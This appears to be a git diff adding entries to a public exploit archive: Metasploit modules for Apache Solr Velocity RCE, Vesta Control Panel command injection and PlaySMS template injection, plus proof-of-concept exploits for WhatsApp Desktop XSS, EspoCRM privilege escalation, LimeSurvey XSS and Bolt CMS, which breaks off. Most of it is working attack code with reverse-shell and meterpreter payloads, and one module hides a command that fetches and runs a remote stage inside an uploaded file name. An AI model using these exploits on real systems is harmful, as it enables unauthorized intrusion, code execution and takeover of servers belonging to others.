'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'], + ], + 'Platform' => ['linux', 'unix', 'win'], + 'Targets' => + [ + [ + 'Unix (in-memory)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } + } + ], + [ + 'Linux (dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :linux_dropper, + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, + 'CmdStagerFlavor' => %w[curl wget] + } + ], + [ + 'x86/x64 Windows PowerShell', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :windows_psh, + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } + } + ], + [ + 'x86/x64 Windows CmdStager', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :windows_cmdstager, + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' }, + 'CmdStagerFlavor' => %w[vbs certutil] + } + ], + [ + 'Windows Exec', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'Type' => :windows_exec, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' } + } + ], + ], + 'DisclosureDate' => "2019-10-29", # ISO-8601 formatted + 'DefaultTarget' => 0, + 'Privileged' => false + ) + ) + + register_options( + [ + Opt::RPORT(8983), + OptString.new('USERNAME', [false, 'Solr username', 'solr']), + OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']), + OptString.new('TARGETURI', [false, 'Path to Solr', '/solr/']) + ] + ) + end + + # if we are going to exploit, we only need one core to be exploitable + @vuln_core = "" + # OS specific stuff + @target_platform = "" + # if authentication is used + @auth_string = "" + + def check_auth + # see if authentication is required for the specified Solr instance + auth_check = solr_get('uri' => normalize_uri(target_uri.path)) + + # successfully connected? + unless auth_check + print_bad("Connection failed!") + return nil + end + + # if response code is not 200, then the Solr instance definitely requires authentication + unless auth_check.code == 200 + # if authentication is required and creds are not provided, we cannot reliably check exploitability + if datastore['USERNAME'] == "" && datastore['PASSWORD'] == "" + print_bad("Credentials not provided, skipping credentialed check...") + return nil + end + + # otherwise, try the given creds + auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string) + + # successfully connected? + unless attempt_auth + print_bad("Connection failed!") + return nil + end + # if the return code is not 200, then authentication definitely failed + unless attempt_auth.code == 200 + print_bad("Invalid credentials!") + return nil + end + + store_valid_credential( + user: datastore['USERNAME'], + private: datastore['PASSWORD'], + private_type: :password, + proof: attempt_auth.to_s + ) + + @auth_string = auth_string + end + # a placeholder return value. Not requiring auth should throw no errors + "" + end + + # check for vulnerability existence + def check + auth_res = check_auth + unless auth_res + return CheckCode::Unknown("Authentication failed!") + end + + # send a GET request to get Solr and system details + ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string) + + # can't connect? that's an automatic failure + unless ver + return CheckCode::Unknown("Connection failed!") + end + + # convert to JSON + ver_json = ver.get_json_document + # get Solr version + solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version']) + print_status("Found Apache Solr #{solr_version}") + # get OS version details + @target_platform = ver_json['system']['name'] + target_arch = ver_json['system']['arch'] + target_osver = ver_json['system']['version'] + print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}") + # uname doesn't show up for Windows, so run a check for that + if ver_json['system']['uname'] + # print uname only when verbose + vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'") + end + + # the vulnerability is only present in Solr versions <= 8.3.0 + unless solr_version <= Gem::Version.new('8.3.0') + return CheckCode::Safe("Running version of Solr is not vulnerable!") + end + + # enumerate cores + cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string) + + # can't connect? that's yet another automatic failure + unless cores + return CheckCode::Unknown("Could not enumerate cores!") + end + + # convert to JSON yet again + cores_json = cores.get_json_document + # draw up an array of all the cores + cores_list = Array.new + # get the core names + cores_json['status'].keys.each do |core_name| + cores_list.push(core_name) + end + + # no cores? that means nothing to exploit. + if cores_list.empty? + return CheckCode::Safe("No cores found, nothing to exploit!") + end + + # got cores? tell the operator which cores were found + print_status("Found core(s): #{cores_list.join(', ')}") + possibly_vulnerable_cores = {} + + cores_list.each do |core| + # for each core, attempt to get config + core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string) + + # can't retrieve configuration for that core? go next + unless core_config + print_error("Could not retrieve configuration for core #{core}!") + next + end + + # convert to JSON + core_config_json = core_config.get_json_document + # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable + if core_config_json['config']['queryResponseWriter'].keys.include?("velocity") + vprint_good("Found Velocity Response Writer in use by core #{core}") + if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true" + vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.") + possibly_vulnerable_cores.store(core, true) + else + # if params.resource.loader.enabled is false, we need to set it to true before exploitation + print_warning("params.resource.loader.enabled for core #{core} is set to false.") + possibly_vulnerable_cores.store(core, false) + end + else + vprint_error("Velocity Response Writer not found in core #{core}") + next + end + end + + # look at the array of possibly vulnerable cores + if possibly_vulnerable_cores.empty? + CheckCode::Safe("No cores are vulnerable!") + else + # if possible, pick a core that already has params.resource.loader.enabled set to true + possibly_vulnerable_cores.each do |core| + if core[1] == true + @vuln_core = core + break + end + end + # otherwise, just pick the first one + if @vuln_core.to_s == "" + @vuln_core = possibly_vulnerable_cores.first + end + CheckCode::Vulnerable + end + end + + # the exploit method + def exploit + unless [CheckCode::Vulnerable].include? check + fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!" + end + + print_status("Targeting core '#{@vuln_core[0]}'") + + # if params.resource.loader.enabled for that core is false + if @vuln_core[1] != true + # the new config in JSON format + enable_params_resource_loader = { + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } + }.to_json + + opts_post = { + 'method' => 'POST', + 'connection' => 'Keep-Alive', + 'ctype' => 'application/json;charset=utf-8', + 'encode_params' => false, + 'uri' => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'), + 'data' => enable_params_resource_loader + } + + unless @auth_string == "" + opts_post.store('authorization', @auth_string) + end + + print_status("params.resource.loader.enabled is false, setting it to true...") + update_config = send_request_cgi(opts_post) + + unless update_config + fail_with Failure::Unreachable, "Connection failed!" + end + + # if we got anything other than a 200 back, the configuration update failed and the exploit won't work + unless update_config.code == 200 + fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!" + end + + print_good("params.resource.loader.enabled is now set to true!") + end + + # windows... + if @target_platform.include? "Windows" + # if target is wrong, warn and exit before doing anything + unless target.name.include? "Windows" + fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!" + end + + case target['Type'] + # PowerShell... + when :windows_psh + # need PowerShell for this + winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true) + unless winenv_path + fail_with Failure::Unreachable, "Connection failed!" + end + + # did the command to check for PATH execute? + unless winenv_path.code == 200 + fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!" + end + + # is PowerShell in PATH? + if /powershell/i =~ winenv_path.body.to_s + # only interested in the contents of PATH. Everything before it is irrelevant + paths = winenv_path.body.split('=')[1] + # confirm that PowerShell exists in the PATH by checking each one + paths.split(';').each do |path_val| + # if PowerShell exists in PATH, then we are good to go + unless /powershell/i =~ path_val + next + end + + print_good("Found Powershell at #{path_val}") + # generate PowerShell command, encode with base64, and remove comspec + psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) + # specify full path to PowerShell + psh_cmd.insert(0, path_val) + # exploit the thing + execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + break + end + else + fail_with Failure::BadConfig, "PowerShell not found!" + end + # ... CmdStager ... + when :windows_cmdstager + print_status("Sending CmdStager payload...") + execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + # ... or plain old exec? + when :windows_exec + cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}" + execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + end + end + + # ... or nix-based? + if @target_platform.include? "Linux" + # if target is wrong, warn and exit before doing anything + if target.name.include? "Windows" + fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!" + end + + case target['Type'] + when :linux_dropper + execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + when :unix_memory + cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}" + execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0]) + end + end + end + + # some prep work has to be done to work around the limitations of Java's Runtime.exec() + def execute_cmdstager_begin(_opts) + if @target_platform.include? "Windows" + @cmd_list.each do |command| + command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ") + end + else + @cmd_list.each do |command| + command.insert(0, "/bin/bash -c $@|/bin/bash . echo ") + end + end + end + + # sic 'em, bois! + def execute_command(cmd, opts = {}) + # custom template which enables command execution + template = <<~VELOCITY + #set($x="") + #set($rt=$x.class.forName("java.lang.Runtime")) + #set($chr=$x.class.forName("java.lang.Character")) + #set($str=$x.class.forName("java.lang.String")) + VELOCITY + + # attempts to solve the quoting problem, partially successful + if target.name.include?("Unix") + template += <<~VELOCITY + #set($ex=$rt.getRuntime().exec("#{cmd}")) + VELOCITY + else + template += <<~VELOCITY + #set($ex=$rt.getRuntime().exec('#{cmd}')) + VELOCITY + end + + template += <<~VELOCITY + $ex.waitFor() + VELOCITY + + # the next 2 lines cause problems with CmdStager, so it's only used when needed + # during the check for PowerShell existence, or by specific payloads + if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory + template += <<~VELOCITY + #set($out=$ex.getInputStream()) + #if($out.available()) + #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end + #else + #end + VELOCITY + end + + # execute the exploit... + raw_result = solr_get( + 'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'), + 'auth' => opts['auth_string'], + 'vars_get' => { + 'q' => '1', + 'wt' => 'velocity', + 'v.template' => 'custom', + 'v.template.custom' => template + } + ) + + # Executing PATH always gives a result, so it can return safely + if opts['winenv_check'] + return raw_result + end + + # for printing command output + unless raw_result.nil? + unless raw_result.code == 200 + fail_with Failure::PayloadFailed, "Payload failed to execute!" + end + + # to get pretty output + result_inter = raw_result.body.to_s.sub("0\n", ":::").split(":::").last + unless result_inter.nil? + final_result = result_inter.split("\n").first.strip + print_good(final_result) + end + end + end + + # make sending requests easier + def solr_get(opts = {}) + send_request_cgi_opts = { + 'method' => 'GET', + 'connection' => 'Keep-Alive', + 'uri' => opts['uri'] + } + + # @auth_string defaults to "" if no authentication is necessary + # otherwise, authentication is required + if opts['auth'] != "" + send_request_cgi_opts.store('authorization', opts['auth']) + end + + # a bit unrefined, but should suffice in this case + if opts['vars_get'] + send_request_cgi_opts.store('vars_get', opts['vars_get']) + end + + send_request_cgi(send_request_cgi_opts) + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48294.rb b/exploits/multiple/webapps/48294.rb new file mode 100755 index 000000000..53c997d1a --- /dev/null +++ b/exploits/multiple/webapps/48294.rb @@ -0,0 +1,239 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in v-list-user-backups bash script file. + Low privileged authenticated users can execute arbitrary commands under the context of the root user. + + An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. + During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As + result of that backup process, when an attacker try to list existing backups injected payload will be + executed. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], + ['CVE', '2020-10808'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8083, + 'WfsDelay' => 300, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Mar 17 2020", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(8083), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + deregister_options('FTPUSER', 'FTPPASS') + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def login + # + # This is very simple login process. Nothing important. + # We will be using cookie and csrf_token across the module so that we are global variable. + # + print_status('Retrieving cookie and csrf token values') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + }) + + if res && res.code == 200 && !res.get_cookies.empty? + @cookie = res.get_cookies + @csrf_token = res.body.scan(//).flatten[0] || '' + if @csrf_token.empty? + fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') + end + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + print_good('Cookie and CSRF token values successfully retrieved') + + print_status('Authenticating to HTTP Service with given credentials') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login', '/'), + 'cookie' => @cookie, + 'vars_post' => { + 'token' => @csrf_token, + 'user' => username, + 'password' => password + } + }) + + if res && res.code == 302 && !res.get_cookies.empty? + print_good('Successfully authenticated to the HTTP Service') + @cookie = res.get_cookies + else + fail_with(Failure::Unknown, 'Credentials are not valid.') + end + end + + def is_scheduled_backup_running + res = trigger_scheduled_backup + # + # MORE explaination. + # + if res && res.code == 302 + res = trigger_payload + if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') + return true + else + print_good('It seems scheduled backup is done ..! Triggerring payload <3') + return false + end + else + fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') + end + return false + end + + def trigger_payload + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), + }) + if res && res.code == 200 + res + else + fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') + end + end + + def trigger_scheduled_backup + res = send_request_cgi({ + 'method' => 'GET', + 'cookie' => @cookie, + 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), + }) + if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// + res + else + fail_with(Failure::Unknown, 'Something went wrong.') + end + end + + def payload_implant + # + # Our payload will be placed as a file name on FTP service. + # Payload lenght can't be more then 255 and SPACE can't be used because of the + # bug in the backend software. Due to these limitations, I used web delivery method. + # + # When the initial payload executed. It will execute very short perl command, which is going to fetch + # actual python meterpreter first stager and execute it. + # + final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first + p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" + + # Yet another datastore variable overriding. + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + port_restore = datastore['RPORT'] + datastore['RPORT'] = 21 + datastore['FTPUSER'] = username + datastore['FTPPASS'] = password + + # + # Connecting to the FTP service with same creds as web ui. + # Implanting the very first stage of payload as a empty file. + # + if (not connect_login) + fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') + end + print_good('Successfully authenticated to the FTP service') + + res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") + if res.nil? + fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") + end + print_good('Successfully uploaded the payload as a file name') + disconnect + + # Revert datastore variables. + datastore['RPORT'] = port_restore + datastore['SSL'] = true if ssl_restore + end + + def exploit + start_http_server + payload_implant + login + trigger_scheduled_backup + print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') + while is_scheduled_backup_running == true + print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') + Rex.sleep(30) + end + stop_service + end + + def on_request_uri(cli, request) + print_good('First stage is executed ! Sending 2nd stage of the payload') + second_stage = "python -c \"#{payload.encoded}\"" + send_response(cli, second_stage, {'Content-Type'=>'text/html'}) + end + + def start_http_server + # + # HttpClient and HttpServer use same SSL variable :( + # We don't need a SSL for payload delivery. + # + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + print_status("Second payload download URI is #{get_uri}") + # We need that global variable since get_uri keep using SSL from datastore + # We have to get the URI before restoring the SSL. + @second_stage_url = get_uri + datastore['SSL'] = true if ssl_restore + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/48295.txt b/exploits/multiple/webapps/48295.txt new file mode 100644 index 000000000..7e0e139ae --- /dev/null +++ b/exploits/multiple/webapps/48295.txt @@ -0,0 +1,42 @@ +# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting +# Date: 2020-01-21 +# Exploit Author: Gal Weizman +# Vendor Homepage: https://www.whatsapp.com +# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe +# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg +# Version: 0.3.9308 +# Tested On: Mac OS, Windows, iPhone +# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 + +// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) +// step 2: open devtools and search in all files "t=e.id" +// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found +// step 4: paste "https://example.com" in the text box and hit "Enter" +// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" + +var payload = `(async function() { + alert(navigator.userAgent); + (async function() { + // read "file:///C:/windows/system32/drivers/etc/hosts" content + const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); + const t = await r.text(); + alert(t); + }()) +}())`; + +payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; + +e.__x_matchedText = payload; + +e.__x_body = ` + Innocent text + + ${payload} + + More Innocent text +`; + +// step 6: press F8 in order for the execution to continue +// result: a message should be sent to the victim that once is clicked will execute the payload above + +// further information: https://github.com/weizman/CVE-2019-18426 \ No newline at end of file diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt new file mode 100644 index 000000000..af82da422 --- /dev/null +++ b/exploits/multiple/webapps/48376.txt @@ -0,0 +1,40 @@ +# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation +# Author: Besim ALTINOK +# Vendor Homepage: https://www.espocrm.com +# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip +# Version: v5.8.5 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------------- + +Details: +-------------------------------------------- + +1- When we sent a request to the /api/v1/App/user, we can see user details +--- +First Request: +--------------------------- +GET /api/v1/App/user HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 ************************* +Authorization: Basic ************************************* +Espo-Authorization: ************************************* +Espo-Authorization-By-Token: true +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: auth-token-secret=cdc7f7*********************377; +auth-username=user1; auth-token=3a874a********************************48 +---- + +2- When we decode Basic Authorization and Espo-Authorization and change the +value with another username (like admin) in the first request, we can see +other user information and access like BOSS +---------- + +3- Some Examples and encode technique + +- BASE64: +First type: dXNlcjE6MQ== (user1:1) +Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass) \ No newline at end of file diff --git a/exploits/php/remote/48335.rb b/exploits/php/remote/48335.rb new file mode 100755 index 000000000..a75141519 --- /dev/null +++ b/exploits/php/remote/48335.rb @@ -0,0 +1,153 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'PlaySMS index.php Unauthenticated Template Injection Code Execution', + 'Description' => %q{ + This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution + in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom + PHP template system called 'TPL' which is used in the PlaySMS template engine at + `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a + malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a + second time, results in code execution. + The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection. + + This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine. + }, + 'Author' => + [ + 'Touhid M.Shaikh ', # Metasploit Module + 'Lucas Rosevear' # Found and Initial PoC by NCC Group + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-8644'], + ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'], + ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64' + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'PlaySMS Before 1.4.3', {} ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2020-02-05' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']), + ] + ) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue StandardError + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + # Send Payload in Login Request + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login' + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine the CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + + vprint_status('Trying to send the payload in the username field...') + + # Encoded in base64 to avoid HTML TAGS which are filter by the Application which is also blocking semicolon(;), that is why we're using delete_suffix(';') + evil = "{{#{payload.encoded.delete_suffix(';')}}}" + + # Send Payload with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login' + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => evil, + 'password' => '' + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Request Status Check + if res.code == 302 + print_good('Payload successfully sent') + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Something went wrong") + end + end + + def exploit + cookies = login + vprint_status("Cookies here : #{cookies}") + # Execute Last Sent Username. + send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login' + } + }, 0) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py index 4cd329aa0..46246b5c1 100755 --- a/exploits/php/webapps/47898.py +++ b/exploits/php/webapps/47898.py @@ -12,32 +12,32 @@ import requests import sys -if len(sys.argv) !=3D 6: +if len(sys.argv) != 6: print("[+] Usage : ./exploit.py target username password ip port") exit() -target =3D sys.argv[1] -username =3D sys.argv[2] -password =3D sys.argv[3] -ip =3D sys.argv[4] -port =3D int(sys.argv[5]) +target = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = int(sys.argv[5]) -request =3D requests.session() +request = requests.session() -login_info =3D { +login_info = { "nick": username, "pass": password, "login_button": "Login" } -login_request =3D request.post( - target+"/pandora_console/index.php?login=3D1", +login_request = request.post( + target+"/pandora_console/index.php?login=1", login_info, - verify=3DFalse, - allow_redirects=3DTrue + verify=False, + allow_redirects=True ) -resp =3D login_request.text +resp = login_request.text if "User not found in database" in resp: print("[-] Login Failed") @@ -47,7 +47,7 @@ else: print("[+] Sending crafted graph request ..") -body_request =3D { +body_request = { "date": "0", "time": "0", "period": "0", @@ -65,7 +65,6 @@ body_request =3D { "draw_button": "Draw" } -draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati= -on/netflow/nf_live_view&pure=3D0" +draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0" print("[+] Check your netcat ;)") request.post(draw_url, body_request) \ No newline at end of file diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt new file mode 100644 index 000000000..213de9367 --- /dev/null +++ b/exploits/php/webapps/48289.txt @@ -0,0 +1,30 @@ +# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg, Michael Burkey +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.1.11+200316 +# Tested on: Ubuntu 18.04.4 +# CVE : CVE-2020-11456 + +# Vulnerability Details +Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. +Vulnerable Parameter : "title" + + +# POC +POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 +Host: TARGET +Content-Length: 374 +Cache-Control: max-age=0 +Origin: http://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D +Connection: close + +YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0= \ No newline at end of file diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py new file mode 100755 index 000000000..9b3401a53 --- /dev/null +++ b/exploits/php/webapps/48296.py @@ -0,0 +1,167 @@ +# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution +# Date: 2020-04-05 +# Exploit Author: r3m0t3nu11 +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.x +# Tested on: Linux +# CVE : not-yet-0day + +# last version + +# p0c + + +#!/usr/bin/python + +import requests +import sys +import warnings +import re +import os +from bs4 import BeautifulSoup +from colorama import init +from termcolor import colored + +init() + +print(colored(''' + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ + ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ +▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ 